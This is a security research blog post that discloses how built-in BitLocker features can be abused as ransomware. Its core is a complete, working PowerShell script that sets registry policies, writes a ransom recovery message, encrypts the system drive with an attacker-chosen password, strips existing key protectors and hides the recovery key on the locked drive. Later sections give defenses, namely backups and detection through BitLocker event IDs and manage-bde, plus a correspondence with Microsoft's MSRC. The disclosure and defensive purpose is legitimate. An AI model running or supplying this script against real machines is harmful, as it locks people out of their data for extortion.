Bitlocker Ransomware: Using BitLocker for Nefarious Reasons
I don’t know how I got there, but a few days ago I found myself looking at an article on the new “features” that Microsoft has implemented for BitLocker on Windows 10. The most noteworthy of the features that really captured my attention was that there is a new group policy for configuring pre-boot recovery. I know that doesn’t sound all that exciting by itself, but if you combine that with another feature introduced in Windows 8 where the OS drive can now be encrypted without a TPM (Trusted Platform Module) and even without a USB drive; you have a recipe for evil.
After presenting this discovery to BHIS they had questions of their own. More research revealed that you can strip away the recovery keys and passwords on a protected drive and replace them without having to know what those passwords or keys were to begin with.
BitLocker Based Ransomware!
Using the BitLocker Cmdlets for Powershell I was able to create a script that encrypts the System drive, with a custom recovery message. The following script locks the drive and throws away the recovery key, by placing it on the drive being encrypted. The only way to unlock the drive is with the password.
If the drive is already protected with BitLocker the script strips out all of the passwords and recovery keys and replaces them.
Note: The script requires local administrative rights.
#BitLocker for Ransom #Is BitLocker already enabled on the system drive $Check = (get-BitLockervolume -mountpoint $ENV:SystemDrive) $Status = $Check.ProtectionStatus if($Status -eq 'Off'){echo 'BitLocker NOT Enabled on System Drive'} if($Status -eq 'On'){echo 'BitLocker IS Enabled on System Drive'} #Set registry first REG ADD HKLM\SOFTWARE\Policies\Microsoft\FVE /v EnableBDEWithNoTPM /t REG_DWORD /d 1 /f REG ADD HKLM\SOFTWARE\Policies\Microsoft\FVE /v UseAdvancedStartup /t REG_DWORD /d 1 /f REG ADD HKLM\SOFTWARE\Policies\Microsoft\FVE /v UseTPM /t REG_DWORD /d 2 /f REG ADD HKLM\SOFTWARE\Policies\Microsoft\FVE /v UseTPMKey /t REG_DWORD /d 2 /f REG ADD HKLM\SOFTWARE\Policies\Microsoft\FVE /v UseTPMKeyPIN /t REG_DWORD /d 2 /f #Change the recovery message to meet your needs. In my example I put a fake website where the victim can come and pay for their password REG ADD HKLM\SOFTWARE\Policies\Microsoft\FVE /v RecoveryKeyMessage /t REG_SZ /d 'please Visit my hacker site https://yourscrewed.hahaha to give me money' /f REG ADD HKLM\SOFTWARE\Policies\Microsoft\FVE /V RecoveryKeyMessageSource /t REG_DWORD /d 2 /f REG ADD HKLM\SOFTWARE\Policies\Microsoft\FVE /v UseTPMPIN /t REG_DWORD /d 2 /f #Use a Strong Password Here! $PlainPassword = "P@ssw0rd" $SecurePassword = $PlainPassword | ConvertTo-SecureString -AsPlainText -Force if($Status -eq 'Off'){ #Enable BitLocker, Encrypt the used space on the C: drive enable-BitLocker -EncryptionMethod Aes256 -password $securepassword -mountpoint $ENV:SystemDrive -PasswordProtector -skiphardwaretest -UsedSpaceOnly #To use the Custom Recovery Screen, there must be a recovery key created. I dont want to use the recovery key, so I put it on the encrypted C: drive so it is inaccessible. add-BitLockerkeyprotector -mountpoint $ENV:SystemDrive -RecoveryKeyProtector -RecoveryKeyPath $ENV:SystemDrive\ #Uncomment to restart the Computer ASAP so that the damage is done before the user can undo it. I dont do this by default #restart-computer } #If BitLocker is already enabled on the systemd drive. The following will execute, removing all passwords and recovery keys. Then adding my own passwords and keys just like before. if ($Status -eq 'On'){ #Strip all Passwords and Recovery keys (Not yet Tested with TPM) $IDS = $check.KeyProtector.KeyProtectorID foreach($ID in $IDS){ Remove-BitLockerKeyProtector -Mountpoint $ENV:SystemDrive -KeyProtectorID $ID } add-BitLockerkeyprotector -mountpoint $ENV:SystemDrive -PasswordProtector -Password $securepassword add-BitLockerkeyprotector -mountpoint $ENV:SystemDrive -RecoveryKeyProtector -RecoveryKeyPath $ENV:SystemDrive\ Resume-BitLocker -MountPoint $ENV:SystemDrive }
##ENDSCRIPT##
The script executes quickly and the next time the computer reboots, the user is hit with the usual BitLocker password prompt. Pressing the ESC key they can see the recovery options. You will see the custom recovery message that was put into the system’s registry.
And there you have it. Ransomware using Microsoft built in features and tools. I will not go into detail on how to weaponize this into a payload or force a prompt for elevation, there are plenty of blog posts and videos on the internet that already have that information.
There is a line available in the script that will restart the computer as soon as the script executes, this prevents the user from halting the locking process. I leave the restart option commented out by default as I think most users will ignore the small notification that warns them the drive is being encrypted. In my experience this notification only appears if the drive was not encrypted before the script ran.
Research Caveats
I did all of this research on a workgroup fresh install of Windows 10 Evaluation. There is nothing that suggests to me that doing this on a domain joined system would not have similar results as BitLocker reads the current registry settings, not the ones loaded at boot time.
Defenses – Be Prepared to Lose Everything
Backup your personal data. If everything you need is in the cloud, on an external device or some other remote storage, you will be fine.
Defenses – How do I Identify this is happening?
Detection With Powershell or CMD
This is simple to detect if you are looking for it. You can use the same tools that enabled BitLocker to detect if it is running. There are ways within Windows to run a script at Shutdown/Restart, or even have a script run at a regular interval that queries if BitLocker is on and what/where the recovery keys and methods are. Compare what the current recovery key is to what you know that key should be, if the key is something different then reset the keys, or send an alert to the helpdesk, etc.
The manage-bde.exe tool allows you to do similar tasks as the Powershell CMDlets if you are more comfortable with cmd and batch scripts.
Detection With Event Logs
BitLocker events do log to the source Applications and Services → Microsoft → Windows → BitLocker-API → Management by default. Event 775 occurs when a Key Protector is created. Event 768 occurs when encryption starts on a drive ( at least in my testing the c: drive). There are other events in there 796, and 780 that occurred during my experiment. Setting up alerts on these logs is a great way to detect if BitLocker is being turned on/off or the keys are being changed.
Also avoid giving attackers administrative privileges in the first place. Use common malware defenses; scanning email attachments, user awareness training, etc.
Personally I think Microsoft made a big mistake allowing BitLocker to be configured without forcing the use of USB or TPM, they also really missed the security mark by not making you reauthenticate passwords and recovery keys before changing them.
I reached out to the Microsoft Security Response Center expressing my concerns with the current implementation of BitLocker and they were so kind as to respond.
Microsoft MSRC Rep.
“Hello,
Thank you for contacting the Microsoft Security Response Center (MSRC). To use BitLocker in this way the malicious person would need to have already compromised the machine and would have Administrator Privilege, in that case they could do whatever they wanted to the system, just as any local administrator could.
Regards,
MSRC”
I replied back.
“There are many security technologies in place today that even though my system is compromised the attacker still has to authenticate to change the password. Is there a way I can implement BitLocker in such a way to force the administrator to authenticate the Recovery Key before changing it?
Is Microsoft considering adding functionality like this to BitLocker in the future?”
Microsoft Responded.
“Thank you for contacting the Microsoft Security Response Center (MSRC). This would not be a security vulnerability and is likely by design. You can submit the suggestion to the Windows team using the Windows Feedback app in Windows 10.”
Microsoft does take security seriously, I just need to find the right way to release this information. I will follow the suggestion from Microsoft from inside a virtual machine, I don’t like to tie my operating system to my Microsoft account, call me old fashioned.
_____
To grab a copy/paste version of the code visit Robert’s GitHub here.
Ready to learn more?
Level up your skills with affordable classes from Antisyphon!
Available live/virtual and on-demand